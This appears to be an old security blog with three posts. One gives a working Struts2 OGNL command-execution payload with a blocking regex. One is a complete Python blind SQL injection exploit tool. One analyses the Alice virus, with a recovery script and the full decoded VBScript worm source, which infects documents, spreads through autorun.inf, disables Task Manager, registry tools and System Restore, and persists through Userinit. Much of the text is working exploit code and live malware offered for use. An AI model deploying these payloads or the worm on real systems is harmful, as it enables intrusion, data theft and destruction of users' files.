It be able to get system permissions, An attacker could execute commands.
http://URL/PAGE.ACTION(or .DO)?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(%22whoami%22)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
Solution:
- Upgrade Version Struts2
- Blocking Pattern Regex
(.*)(redirect|action)(.*)java(.|%2e)lang(.|%2e)ProcessBuilder(.*)com(.|%2e)opensymphony(.*)
Reference: http://www.exploit-db.com/exploits/25980/
Friday, 19 July 2013
Thursday, 4 July 2013
Bool-based Blind SQL Injection python.
I made bool-based blind sql injection.
Sometimes I need blind sql injection codes for a CTF.
I will add more functions.
Reference: www.exploit-db.com/download_pdf/12967/
Sometimes I need blind sql injection codes for a CTF.
I will add more functions.
import sys
import re
import urllib
import urllib2
import inspect
#import base64
#import mimetypes
#import pprint
def set_globalvar():
global type_attack
global host
global findout
global n
global query
global sqli_start
global sqli_end
global url
global parameter
#query = "SELECT 1"
query = "SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.columns"
n=8
host="http://127.0.0.1"
url="/sqli.php"
parameter="a"
findout="Sample"
session=""
type_attack="GET"
#type_attack = "POST"
#type_attack = "COOKIE"
#type_attack = "MULTIPART"
sqli_start="1 AND "
sqli_end="--"
def set_error():
print("It is an error MSG from function: %s" % (inspect.stack()[1][3]))
return 0
def printr(data):
for x in data:
sys.stdout.write(x)
sys.stdout.flush()
print("")
print("")
print("[*] Exploit Complete!")
def set_send(params):
params = "IF(1=1,%s,0)" % (params)
finalquery=sqli_start+params+sqli_end
encoding_finalquery = urllib2.quote(finalquery)
if(type_attack=="GET"):
action = urllib2.build_opener()
#action.addheaders.append(('Cookie', 'SESSION=%s' %(session)))
#resp = urllib2.urlopen(host+url+"?"+parameter+"="+encoding_finalquery)
resp = action.open(host+url+"?"+parameter+"="+encoding_finalquery)
elif(type_attack=="POST"):
values = {parameter : finalquery}
cookie = urllib.urlencode(values)
resp = urllib2.urlopen(host+url, cookie)
elif(type_attack=="COOKIE"):
action = urllib2.build_opener()
action.addheaders.append(('Cookie', '%s=%s' % (parameter, encoding_finalquery)))
resp = action.open(host+url)
elif(type_attack=="MULTIPART"):
filename = "test.php"
CRLF = '\r\n'
boundary = '----WebKitFormBoundaryL4f8jRRQx76T6nV9'
parts = []
parts.append('--' + boundary)
parts.append('Content-Disposition: form-data; name="%s"' % (parameter))
parts.append('')
parts.append(finalquery)
parts.append('--' + boundary)
parts.append('Content-Disposition: form-data; name="pwd"; filename="%s"' % (filename))
parts.append('Content-Type: application/octet-stream')
parts.append('')
parts.append('1234')
parts.append('--' + boundary + '--')
parts.append('')
body= CRLF.join(parts)
headers = {'content-type' : 'multipart/form-data; boundary=%s' % (boundary)}
req = urllib2.Request(host+url, body, headers)
resp = urllib2.urlopen(req)
data = "\n".join([resp.info().get(i) for i in resp.info()])
data += "\n" + "".join([repr(x) for x in resp])
return data
def set_getbit(data):
try:
bit = re.findall(findout, data)
if findout in bit: return '1'
else: return '0'
except IndexError: raise RuntimeError
except TypeError: raise RuntimeError
def set_getvalue(val, n=8):
byte=""
for bit in range(n-1, -1, -1):
tmp = set_getbit(set_send("(%s>>%d&1)" % (val, bit)))
byte += tmp
return int(byte, 2)
def set_getlength(content):
return set_getvalue("LENGTH(%s)" % content, 32)
def set_getstring(content):
length = set_getlength(content)
print(" [-] Lengh: %s" % length)
print(" [-] Result")
for i in xrange(length+1):
yield chr(set_getvalue("ASCII(MID((%s),%d,1))" % (content, i)))
def get_sqlexploit(query):
print(" [-] Method: %s" % (type_attack))
if not ((type_attack is "GET") or (type_attack is "POST") or (type_attack is "COOKIE") or (type_attack is "MULTIPART")):
print("Please check type of the attack")
set_error()
else:
'''
MySQL If Statement
IF(condition,true-part,false-part) (M)
SELECT IF(1=1,'true','false')
SQL Server If Statement
IF condition true-part ELSE false-part (S)
IF (1=1) SELECT 'true' ELSE SELECT 'false'
'''
try:
for i in set_getstring("(%s)" %(query)): yield i
except RuntimeError:
yield "SQL error."
raise StopIteration
def main():
set_globalvar()
print(" - A Bool-based SQL Injection Vulnerability Exploit")
print("")
print(" Author: Kerz")
print(" Date: 05/07/2013")
print("")
print("[*] Target: %s" % host+url)
print("[+] Injection")
printr(get_sqlexploit(query))
if __name__ == '__main__':
main()
Reference: www.exploit-db.com/download_pdf/12967/
Tuesday, 2 July 2013
An Alice Virus analysis by script-kid.
Do not EXECUTE this code on your normal window's laptop.
I got an Alice Virus from e-mail.
It is a virus which has:
It makes all of doc, docx, rtf files to be .vbe of 8 kb and hiding doc files.
It .htm and .html file to be .hta with a VBscript of Alice Virus.
It is encoded a Microsoft Script Encoder, however, we can decode it using scrdec18.
It deletes .lnk files
It changes and removes window register's values.
It infects autorun.inf
it makes Alice.sys and Alice.alc: located in c:\Windows\System32\Drivers\ (32bit).
The MS Essential can detect the virus, on the other hand, it cannot recover html files.
First of all, I tried to make a program for recovering html file:
I coded a string counting function of "alice.tmp" on ".HTA" files until it does not have "alice.tmp".
I did not have files include "alice.tmp" strings when I try to fix infected files.
I removed (5 * (alice.tmp counting / 2)) lines from end of the hta files.
I changed file extension from .hta to .html.
Second, I installed MS Essential and fixed the Alice Virus.
Last, I set doc, docx and rtf files to get normal permissions like unhide, unread-only.
I set restoring registers.
It is the logic for hta2html source code.
import os
import re
def os_walkf(root, filterDir=None, filterName=None, filterExt=None):
for base, dirs, names in os.walk(root):
if filterDir:
dirs[:] = [dir for dir in dirs if filterDir(dir)]
if filterName:
if filterExt:
for name in names:
if filterName(name) and filterExt(os.path.splitext(name)[1]):
yield os.path.join(base, name)
else:
for name in names:
if filterName(name):
yield os.path.join(base, name)
else:
if filterExt:
for name in names:
if filterExt(os.path.splitext(name)[1]):
yield os.path.join(base, name)
else:
for name in names:
yield os.path.join(base, name)
def set_countstring(path):
fs = open(path, "r")
data = fs.read()
strcnt = data.count("alice.tmp")
strcnt = strcnt / 2
fs.close()
return strcnt
def set_filelen(fs):
count = 0
while 1:
line = fs.readline()
count = count + 1
if not line: break
return count
def set_hta2html(path):
strcnt = set_countstring(path)
fs = open(path,"r")
fs_len = set_filelen(fs)
fs.close()
fs = open(path,"r")
new_filename = path[:-3]+'html'
new_fs = open(new_filename, "w")
count = 0
while count < (fs_len - (6*strcnt)):
data = fs.readline()
new_fs.write(data)
count = count + 1
fs.close()
new_fs.close()
def main():
drv = re.findall(r"[A-Z]+:.*$",os.popen("mountvol /").read(),re.MULTILINE)
for i in drv :
for path in os_walkf(i, filterDir=lambda dir: (dir),filterExt=lambda ext: (ext.lower() == ".hta")):
print(path)
set_hta2html(path)
os.remove(path)
main()
It is the Alice Virus code after I used scrdec18.
#Alice virus
option explicit
dim f300e,thpfp,mxlcm,ye9ue,aixlb
set f300e=createobject("Scripting.FileSystemObject")
set thpfp=createobject("WScript.Shell")
set mxlcm=f300e.getfile(wscript.scriptfullname)
set ye9ue=f300e.getspecialfolder(0)
set aixlb=f300e.getspecialfolder(1)
sub ayfp6(ck1cp)
on error resume next
dim s41k8
v41tf(ck1cp)
set s41k8=f300e.getfile(ck1cp)
s41k8.attributes=39
end sub
sub f0l51()
on error resume next
dim bgw3u
for each bgw3u in f300e.drives
if (bgw3u.drivetype=1 or bgw3u.drivetype=2 or bgw3u.drivetype=3) and bgw3u.path<>"A:" then
ayfp6(bgw3u.path&"\alice.alc")
qag1n(bgw3u.path&"\autorun.inf")
syasj(bgw3u.path&"\")
rid6b(bgw3u.path&"\")
end if
next
end sub
sub hy26l()
on error resume next
dim e9ljz,purpl
for each e9ljz in f300e.getfolder(thpfp.specialfolders("Recent")).files
purpl=lcase(f300e.getextensionname(e9ljz.path))
if purpl="lnk" then
zpzoe(e9ljz.path)
end if
next
end sub
sub kugxq(p9krq,wzc5e)
on error resume next
dim qs247,zf3cw,a4zpt,u960a,kbkzd
set qs247=f300e.opentextfile(p9krq,1)
zf3cw=qs247.readall
qs247.close
set qs247=f300e.opentextfile(mxlcm,1)
a4zpt=qs247.readall
qs247.close
u960a=replace(a4zpt,chr(34),chr(216))
kbkzd=vbcrlf&"<HTML>"&vbcrlf&"<SCRIPT language="&chr(34)&"VBScript"&chr(34)&">"&vbcrlf&"on error resume next:set i129a=createobject("&chr(34)&"Scripting.FileSystemObject"&chr(34)&"):set uvqkz=createobject("&chr(34)&"WScript.Shell"&chr(34)&"):set ony43=i129a.getspecialfolder(1):set rowb1=i129a.getspecialfolder(2):p3vli="&chr(34)&u960a&chr(34)&":l3h0l=replace(p3vli,chr(216),chr(34)):esbvk=l3h0l&chr(0):set ivofa=i129a.createtextfile(rowb1&"&chr(34)&"\alice.tmp"&chr(34)&",true):ivofa.write(esbvk):ivofa.close:uvqkz.run(ony43&"&chr(34)&"\wscript.exe //e:vbscript.encode "&chr(34)&"&rowb1&"&chr(34)&"\alice.tmp"&chr(34)&")"&vbcrlf&"</SCRIPT>"&vbcrlf&"</HTML>"
set qs247=f300e.createtextfile(wzc5e,true)
qs247.write(zf3cw)
qs247.write(kbkzd)
qs247.close
end sub
function ljwom(db04w)
ljwom=thpfp.regread("HKCR\."&db04w&"\")
end function
sub llgz8()
on error resume next
do while mxlcm=(aixlb&"\drivers\alice.sys")
f0l51()
loop
end sub
sub m9g2p()
on error resume next
if not f300e.fileexists(aixlb&"\drivers\alice.sys") then
ayfp6(aixlb&"\drivers\alice.sys")
thpfp.run(aixlb&"\wscript.exe //e:vbscript.encode "&aixlb&"\drivers\alice.sys")
else
vs7xo()
wcpw7()
hy26l()
llgz8()
end if
end sub
sub qag1n(fg77p)
on error resume next
dim btfzw,tmkuj
btfzw="[autorun]"&vbcrlf&"shellexecute=wscript.exe //e:vbscript.encode alice.alc"&vbcrlf&"shell\open\command=wscript.exe //e:vbscript.encode alice.alc"&vbcrlf&"shell\explore\command=wscript.exe //e:vbscript.encode alice.alc"
set tmkuj=f300e.createtextfile(fg77p,true)
tmkuj.write(btfzw)
tmkuj.close
if err.number<>0 then
zpzoe(fg77p)
set tmkuj=f300e.createtextfile(fg77p,true)
tmkuj.write(btfzw)
tmkuj.close
end if
set tmkuj=f300e.getfile(fg77p)
tmkuj.attributes=39
end sub
sub rid6b(wib5969)
on error resume next
dim zdet3
for each zdet3 in f300e.getfolder(wib5969).subfolders
if zdet3.name<>"RECYCLER" and zdet3.name<>"System Volume Information" then
syasj(zdet3.path)
rid6b(zdet3.path)
end if
next
end sub
sub syasj(qo1qy)
on error resume next
dim vlx8c,tk8hq,eiklf,fbr9k
for each vlx8c in f300e.getfolder(qo1qy).files
tk8hq=lcase(f300e.getextensionname(vlx8c.path))
eiklf=f300e.getbasename(vlx8c.path)
if (tk8hq="doc" or tk8hq="docx" or tk8hq="rtf") and left(eiklf,2)<>"~$" then
v41tf(qo1qy&"\"&eiklf&".vbe")
vd8vs(vlx8c.path)
elseif tk8hq="htm" or tk8hq="html" then
kugxq(vlx8c.path),(qo1qy&"\"&eiklf&".hta")
zpzoe(vlx8c.path)
end if
next
end sub
sub v41tf(watpl)
on error resume next
dim ugn6h,jk5vz
set ugn6h=f300e.opentextfile(mxlcm,1)
jk5vz=ugn6h.readall
ugn6h.close
set ugn6h=f300e.createtextfile(watpl,true)
ugn6h.write(jk5vz)
ugn6h.close
if err.number<>0 then
zpzoe(watpl)
set ugn6h=f300e.createtextfile(watpl,true)
ugn6h.write(jk5vz)
ugn6h.close
end if
end sub
sub vd8vs(p3zu2)
on error resume next
dim p3fbg
set p3fbg=f300e.getfile(p3zu2)
p3fbg.attributes=38
end sub
sub vs7xo()
on error resume next
thpfp.regdelete"HKCR\*\shellex\ContextMenuHandlers\Open With\"
thpfp.regdelete"HKCR\inffile\shell\Install\command\"
thpfp.regdelete"HKCR\inffile\shell\Install\"
thpfp.regdelete"HKCR\regfile\shell\open\command\"
thpfp.regdelete"HKCR\regfile\shell\open\"
thpfp.regdelete"HKCR\VBEFile\Shell\Open2\command\"
thpfp.regdelete"HKCR\VBEFile\Shell\Open2\"
thpfp.regdelete"HKCR\VBEFile\Shell\Edit\command\"
thpfp.regdelete"HKCR\VBEFile\Shell\Edit\"
thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","0","REG_DWORD"
thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1","REG_DWORD"
thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate","1","REG_DWORD"
thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"
thpfp.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","2","REG_DWORD"
thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","ALICE"
thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization",""
thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",aixlb&"\userinit.exe,"&aixlb&"\wscript.exe //e:vbscript.encode "&aixlb&"\drivers\alice.sys"
thpfp.regwrite"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR","1","REG_DWORD"
thpfp.regwrite"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig","1","REG_DWORD"
end sub
sub wcpw7()
on error resume next
dim r0a7u,rwyg5
r0a7u="HKCR\"&ljwom("doc")
rwyg5="HKCR\"&ljwom("VBE")
thpfp.regwrite rwyg5&"\",thpfp.regread(r0a7u&"\")
thpfp.regwrite rwyg5&"\DefaultIcon\",thpfp.regread(r0a7u&"\DefaultIcon\")
thpfp.regwrite rwyg5&"\FriendlyTypeName",thpfp.regread(r0a7u&"\"),"REG_EXPAND_SZ"
thpfp.regwrite rwyg5&"\NeverShowExt",""
end sub
sub xvhxt()
on error resume next
dim ktl17
ktl17=left(mxlcm,len(mxlcm)-3)
if mxlcm.name="alice.alc" then
thpfp.run ye9ue&"\explorer.exe /e,/select,"&wscript.scriptfullname
elseif f300e.fileexists(ktl17&"doc") then
thpfp.run(thpfp.regread("HKCR\"&ljwom("doc")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"doc"&chr(34))
elseif f300e.fileexists(ktl17&"docx") then
thpfp.run(thpfp.regread("HKCR\"&ljwom("docx")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"docx"&chr(34))
elseif f300e.fileexists(ktl17&"rtf") then
thpfp.run(thpfp.regread("HKCR\"&ljwom("rtf")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"rtf"&chr(34))
end if
end sub
sub zpzoe(yunj7)
on error resume next
dim fbr9k
f300e.deletefile(yunj7)
if err.number<>0 then
set fbr9k=f300e.getfile(yunj7)
fbr9k.attributes=0
f300e.deletefile(yunj7)
end if
end sub
xvhxt()
m9g2p()
Subscribe to:
Posts (Atom)